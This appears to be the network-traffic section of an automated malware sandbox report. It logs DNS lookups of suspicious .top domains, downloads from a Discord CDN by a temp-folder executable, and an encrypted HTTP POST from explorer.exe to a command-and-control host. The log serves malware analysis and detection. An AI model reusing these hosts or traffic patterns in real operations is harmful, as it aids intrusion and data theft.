Oct 29, 2021 20:50:18.462323904 CEST	53	62605	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:18.650249004 CEST	54256	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:18.669735909 CEST	53	54256	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:18.831762075 CEST	52189	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:18.851197004 CEST	53	52189	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:19.008769989 CEST	56131	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:19.028275013 CEST	53	56131	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:23.091990948 CEST	62992	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:23.111346006 CEST	53	62992	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:23.126286030 CEST	54432	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:23.145689011 CEST	53	54432	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:23.334667921 CEST	57227	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:23.622437000 CEST	53	57227	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:26.289412022 CEST	58383	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:26.308362961 CEST	53	58383	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:29.592927933 CEST	63136	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:29.612400055 CEST	53	63136	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:32.816891909 CEST	50911	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:32.836325884 CEST	53	50911	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:36.097990990 CEST	63409	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:36.199309111 CEST	53	63409	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:39.436950922 CEST	59185	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:39.456471920 CEST	53	59185	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:39.478962898 CEST	64236	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:39.499536991 CEST	53	64236	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:43.206115007 CEST	56157	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:43.347680092 CEST	53	56157	8.8.8.8	192.168.2.4
Oct 29, 2021 20:50:43.817467928 CEST	55601	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:50:44.001061916 CEST	53	55601	8.8.8.8	192.168.2.4
Oct 29, 2021 20:51:02.137067080 CEST	52984	53	192.168.2.4	8.8.8.8
Oct 29, 2021 20:51:02.156775951 CEST	53	52984	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Oct 29, 2021 20:49:29.888782978 CEST	192.168.2.4	8.8.8.8	0xafb5	Standard query (0)	xacokuo8.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:29.928281069 CEST	192.168.2.4	8.8.8.8	0xb54	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:30.107043028 CEST	192.168.2.4	8.8.8.8	0xe2f2	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:30.607532978 CEST	192.168.2.4	8.8.8.8	0x700a	Standard query (0)	privacytoolzforyou-6000.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:33.139940023 CEST	192.168.2.4	8.8.8.8	0xa819	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:33.305393934 CEST	192.168.2.4	8.8.8.8	0xa3e5	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:49.902232885 CEST	192.168.2.4	8.8.8.8	0xb690	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:50.074770927 CEST	192.168.2.4	8.8.8.8	0xb2db	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:50.615381002 CEST	192.168.2.4	8.8.8.8	0xfbf4	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:50.785295963 CEST	192.168.2.4	8.8.8.8	0xb4e7	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:50.947933912 CEST	192.168.2.4	8.8.8.8	0xbdab	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:53.345283031 CEST	192.168.2.4	8.8.8.8	0x47b4	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:53.514359951 CEST	192.168.2.4	8.8.8.8	0xdf8c	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:53.678652048 CEST	192.168.2.4	8.8.8.8	0x46dc	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:53.845880985 CEST	192.168.2.4	8.8.8.8	0xdd6a	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:56.904731989 CEST	192.168.2.4	8.8.8.8	0xc0cc	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:56.978686094 CEST	192.168.2.4	8.8.8.8	0x38c5	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:57.716651917 CEST	192.168.2.4	8.8.8.8	0x1f20	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:01.259711027 CEST	192.168.2.4	8.8.8.8	0xe2c7	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:01.427443027 CEST	192.168.2.4	8.8.8.8	0x5877	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:01.593899965 CEST	192.168.2.4	8.8.8.8	0x9d56	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:02.898878098 CEST	192.168.2.4	8.8.8.8	0x6355	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:04.238812923 CEST	192.168.2.4	8.8.8.8	0x4f4a	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:04.432089090 CEST	192.168.2.4	8.8.8.8	0x494f	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:04.600076914 CEST	192.168.2.4	8.8.8.8	0xb9fb	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:04.762348890 CEST	192.168.2.4	8.8.8.8	0xc67a	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:04.920945883 CEST	192.168.2.4	8.8.8.8	0xe9b3	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:06.707464933 CEST	192.168.2.4	8.8.8.8	0xab07	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:06.889554024 CEST	192.168.2.4	8.8.8.8	0x992	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:07.063785076 CEST	192.168.2.4	8.8.8.8	0x3cc9	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:07.242934942 CEST	192.168.2.4	8.8.8.8	0xfd45	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:07.409239054 CEST	192.168.2.4	8.8.8.8	0x5d3e	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:10.076935053 CEST	192.168.2.4	8.8.8.8	0xba14	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:10.412354946 CEST	192.168.2.4	8.8.8.8	0x8a70	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:10.578986883 CEST	192.168.2.4	8.8.8.8	0x98da	Standard query (0)	sysaheu90.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:12.557410955 CEST	192.168.2.4	8.8.8.8	0x1f09	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:13.764990091 CEST	192.168.2.4	8.8.8.8	0xfa35	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:14.022073030 CEST	192.168.2.4	8.8.8.8	0x9212	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:14.229825974 CEST	192.168.2.4	8.8.8.8	0x6deb	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:14.480586052 CEST	192.168.2.4	8.8.8.8	0x1e3a	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:14.733717918 CEST	192.168.2.4	8.8.8.8	0xcb89	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:15.424772978 CEST	192.168.2.4	8.8.8.8	0xd10c	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:15.703027010 CEST	192.168.2.4	8.8.8.8	0x1f42	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:16.362261057 CEST	192.168.2.4	8.8.8.8	0x3e05	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:16.818459988 CEST	192.168.2.4	8.8.8.8	0x4c05	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:18.243271112 CEST	192.168.2.4	8.8.8.8	0xc8f2	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:18.442924976 CEST	192.168.2.4	8.8.8.8	0xf44d	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:18.650249004 CEST	192.168.2.4	8.8.8.8	0x8551	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:18.831762075 CEST	192.168.2.4	8.8.8.8	0xc956	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:19.008769989 CEST	192.168.2.4	8.8.8.8	0xb28f	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:23.091990948 CEST	192.168.2.4	8.8.8.8	0xf62	Standard query (0)	telegalive.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:23.126286030 CEST	192.168.2.4	8.8.8.8	0xef54	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:23.334667921 CEST	192.168.2.4	8.8.8.8	0x8441	Standard query (0)	hajezey1.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:26.289412022 CEST	192.168.2.4	8.8.8.8	0xe8c8	Standard query (0)	telegalive.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:29.592927933 CEST	192.168.2.4	8.8.8.8	0xa01c	Standard query (0)	telegalive.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:32.816891909 CEST	192.168.2.4	8.8.8.8	0x2046	Standard query (0)	telegalive.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:36.097990990 CEST	192.168.2.4	8.8.8.8	0x9878	Standard query (0)	telegalive.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:39.436950922 CEST	192.168.2.4	8.8.8.8	0xe423	Standard query (0)	telegalive.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:39.478962898 CEST	192.168.2.4	8.8.8.8	0x97d6	Standard query (0)	toptelete.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:43.206115007 CEST	192.168.2.4	8.8.8.8	0x66aa	Standard query (0)	nusurtal4f.net	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:43.817467928 CEST	192.168.2.4	8.8.8.8	0xca0c	Standard query (0)	znpst.top	A (IP address)	IN (0x0001)
Oct 29, 2021 20:51:02.137067080 CEST	192.168.2.4	8.8.8.8	0x14a1	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Oct 29, 2021 20:49:29.908396959 CEST	8.8.8.8	192.168.2.4	0xafb5	Name error (3)	xacokuo8.top	none	none	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:29.948579073 CEST	8.8.8.8	192.168.2.4	0xb54	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:30.453305006 CEST	8.8.8.8	192.168.2.4	0xe2f2	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:30.627023935 CEST	8.8.8.8	192.168.2.4	0x700a	No error (0)	privacytoolzforyou-6000.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:33.157532930 CEST	8.8.8.8	192.168.2.4	0xa819	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:33.324784994 CEST	8.8.8.8	192.168.2.4	0xa3e5	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:49.919909000 CEST	8.8.8.8	192.168.2.4	0xb690	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:50.427860975 CEST	8.8.8.8	192.168.2.4	0xb2db	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:50.634933949 CEST	8.8.8.8	192.168.2.4	0xfbf4	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:50.804724932 CEST	8.8.8.8	192.168.2.4	0xb4e7	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:50.965550900 CEST	8.8.8.8	192.168.2.4	0xbdab	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:53.364914894 CEST	8.8.8.8	192.168.2.4	0x47b4	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:53.533778906 CEST	8.8.8.8	192.168.2.4	0xdf8c	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:53.697316885 CEST	8.8.8.8	192.168.2.4	0x46dc	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:53.865500927 CEST	8.8.8.8	192.168.2.4	0xdd6a	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:56.925883055 CEST	8.8.8.8	192.168.2.4	0xc0cc	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:56.925883055 CEST	8.8.8.8	192.168.2.4	0xc0cc	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:56.925883055 CEST	8.8.8.8	192.168.2.4	0xc0cc	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:56.925883055 CEST	8.8.8.8	192.168.2.4	0xc0cc	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:56.925883055 CEST	8.8.8.8	192.168.2.4	0xc0cc	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:56.997981071 CEST	8.8.8.8	192.168.2.4	0x38c5	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:49:57.734257936 CEST	8.8.8.8	192.168.2.4	0x1f20	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:01.278903961 CEST	8.8.8.8	192.168.2.4	0xe2c7	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:01.446866989 CEST	8.8.8.8	192.168.2.4	0x5877	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:01.881928921 CEST	8.8.8.8	192.168.2.4	0x9d56	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:02.918227911 CEST	8.8.8.8	192.168.2.4	0x6355	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:02.918227911 CEST	8.8.8.8	192.168.2.4	0x6355	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:02.918227911 CEST	8.8.8.8	192.168.2.4	0x6355	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:02.918227911 CEST	8.8.8.8	192.168.2.4	0x6355	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:02.918227911 CEST	8.8.8.8	192.168.2.4	0x6355	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:04.258160114 CEST	8.8.8.8	192.168.2.4	0x4f4a	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:04.451560020 CEST	8.8.8.8	192.168.2.4	0x494f	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:04.619395018 CEST	8.8.8.8	192.168.2.4	0xb9fb	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:04.779773951 CEST	8.8.8.8	192.168.2.4	0xc67a	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:04.940284014 CEST	8.8.8.8	192.168.2.4	0xe9b3	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:06.727159023 CEST	8.8.8.8	192.168.2.4	0xab07	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:06.908982992 CEST	8.8.8.8	192.168.2.4	0x992	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:07.083571911 CEST	8.8.8.8	192.168.2.4	0x3cc9	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:07.262455940 CEST	8.8.8.8	192.168.2.4	0xfd45	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:07.428622007 CEST	8.8.8.8	192.168.2.4	0x5d3e	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:10.097321033 CEST	8.8.8.8	192.168.2.4	0xba14	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:10.432265043 CEST	8.8.8.8	192.168.2.4	0x8a70	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:10.597907066 CEST	8.8.8.8	192.168.2.4	0x98da	No error (0)	sysaheu90.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:12.578183889 CEST	8.8.8.8	192.168.2.4	0x1f09	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:12.578183889 CEST	8.8.8.8	192.168.2.4	0x1f09	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:12.578183889 CEST	8.8.8.8	192.168.2.4	0x1f09	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:12.578183889 CEST	8.8.8.8	192.168.2.4	0x1f09	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:12.578183889 CEST	8.8.8.8	192.168.2.4	0x1f09	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:13.784146070 CEST	8.8.8.8	192.168.2.4	0xfa35	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:14.041105032 CEST	8.8.8.8	192.168.2.4	0x9212	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:14.249653101 CEST	8.8.8.8	192.168.2.4	0x6deb	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:14.500092983 CEST	8.8.8.8	192.168.2.4	0x1e3a	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:14.751549006 CEST	8.8.8.8	192.168.2.4	0xcb89	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:15.444143057 CEST	8.8.8.8	192.168.2.4	0xd10c	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:15.722356081 CEST	8.8.8.8	192.168.2.4	0x1f42	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:16.381613016 CEST	8.8.8.8	192.168.2.4	0x3e05	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:16.838211060 CEST	8.8.8.8	192.168.2.4	0x4c05	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:18.262778997 CEST	8.8.8.8	192.168.2.4	0xc8f2	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:18.462323904 CEST	8.8.8.8	192.168.2.4	0xf44d	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:18.669735909 CEST	8.8.8.8	192.168.2.4	0x8551	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:18.851197004 CEST	8.8.8.8	192.168.2.4	0xc956	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:19.028275013 CEST	8.8.8.8	192.168.2.4	0xb28f	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:23.111346006 CEST	8.8.8.8	192.168.2.4	0xf62	Name error (3)	telegalive.top	none	none	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:23.145689011 CEST	8.8.8.8	192.168.2.4	0xef54	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:23.622437000 CEST	8.8.8.8	192.168.2.4	0x8441	No error (0)	hajezey1.top		185.98.87.159	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:26.308362961 CEST	8.8.8.8	192.168.2.4	0xe8c8	Name error (3)	telegalive.top	none	none	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:29.612400055 CEST	8.8.8.8	192.168.2.4	0xa01c	Name error (3)	telegalive.top	none	none	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:32.836325884 CEST	8.8.8.8	192.168.2.4	0x2046	Name error (3)	telegalive.top	none	none	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:36.199309111 CEST	8.8.8.8	192.168.2.4	0x9878	Name error (3)	telegalive.top	none	none	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:39.456471920 CEST	8.8.8.8	192.168.2.4	0xe423	Name error (3)	telegalive.top	none	none	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:39.499536991 CEST	8.8.8.8	192.168.2.4	0x97d6	No error (0)	toptelete.top		172.67.160.46	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:39.499536991 CEST	8.8.8.8	192.168.2.4	0x97d6	No error (0)	toptelete.top		104.21.9.146	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:43.347680092 CEST	8.8.8.8	192.168.2.4	0x66aa	No error (0)	nusurtal4f.net		45.141.84.21	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:44.001061916 CEST	8.8.8.8	192.168.2.4	0xca0c	No error (0)	znpst.top		31.166.224.38	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:44.001061916 CEST	8.8.8.8	192.168.2.4	0xca0c	No error (0)	znpst.top		61.255.185.201	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:44.001061916 CEST	8.8.8.8	192.168.2.4	0xca0c	No error (0)	znpst.top		118.33.109.122	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:44.001061916 CEST	8.8.8.8	192.168.2.4	0xca0c	No error (0)	znpst.top		220.125.1.129	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:44.001061916 CEST	8.8.8.8	192.168.2.4	0xca0c	No error (0)	znpst.top		89.46.29.238	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:44.001061916 CEST	8.8.8.8	192.168.2.4	0xca0c	No error (0)	znpst.top		211.171.233.127	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:44.001061916 CEST	8.8.8.8	192.168.2.4	0xca0c	No error (0)	znpst.top		118.221.132.200	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:44.001061916 CEST	8.8.8.8	192.168.2.4	0xca0c	No error (0)	znpst.top		123.215.94.239	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:44.001061916 CEST	8.8.8.8	192.168.2.4	0xca0c	No error (0)	znpst.top		190.218.32.60	A (IP address)	IN (0x0001)
Oct 29, 2021 20:50:44.001061916 CEST	8.8.8.8	192.168.2.4	0xca0c	No error (0)	znpst.top		176.123.228.234	A (IP address)	IN (0x0001)
Oct 29, 2021 20:51:02.156775951 CEST	8.8.8.8	192.168.2.4	0x14a1	No error (0)	api.2ip.ua		77.123.139.190	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

cdn.discordapp.com

jaqhuuufk.com

hajezey1.top

lhnqxhhk.org

privacytoolzforyou-6000.top

uktwknfaq.net

fnyhcr.com

kejrjwxwy.net

wijjlglvpi.net

chbebm.net

foxbbmduqm.net

uneqpmoi.net

iakfv.org

hbocfb.org

xnalq.com

qflbfkys.org

jyhduujjq.com

yetpvqx.org

jkbenmco.net

jpjsnfgtc.net

jkmns.org

jwvrimo.org

kfnisufi.net

xoynqlbjnc.org

xwytsoqpb.com

ipaup.org

etkxss.com

shpjiv.net

wmbmyysgg.net

hpmdwx.net

lmmge.com

fexsjalrxu.com

xxlvxgkbvo.com

sysaheu90.top

bfxffaryp.net

blprmuxml.org

tkemri.org

uereap.com

muywwft.org

yfayr.net

sivhm.org

uwebveg.org

lsmjboth.net

ucowlihgbp.com

vchmiecd.org

pmltrxuim.com

tdbyxcrg.org

hmoapn.com

sefui.org

rjpartffs.com

toptelete.top

91.219.236.97

nusurtal4f.net

znpst.top

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49800	162.159.130.233	443	C:\Users\user\AppData\Local\Temp\69B.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49804	162.159.130.233	443	C:\Users\user\AppData\Local\Temp\69B.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.4	49772	185.98.87.159	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 29, 2021 20:49:49.973531008 CEST	1452	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kejrjwxwy.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 247 Host: hajezey1.top
Oct 29, 2021 20:49:49.973553896 CEST	1452	OUT	Data Raw: 10 87 86 e3 1a 81 d1 bb b9 36 0d 31 0f b9 e4 f9 35 15 af 32 a2 45 6b eb c8 ee de f6 f3 ae 93 80 11 c4 5c a0 6c 1b c8 e4 9b d8 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd a2 91 ba 77 d4 75 24 f3 c4 85 de 9c 66 5d 02 c8 a1 c1 64 4b a3 8c 1d Data Ascii: 6152Ek\lwmwu$f]dKmUg_`u[,Czp$p>5+8fy?UXF:?MP9f=qX?\|OtK#;:pePUh\T+pvBO
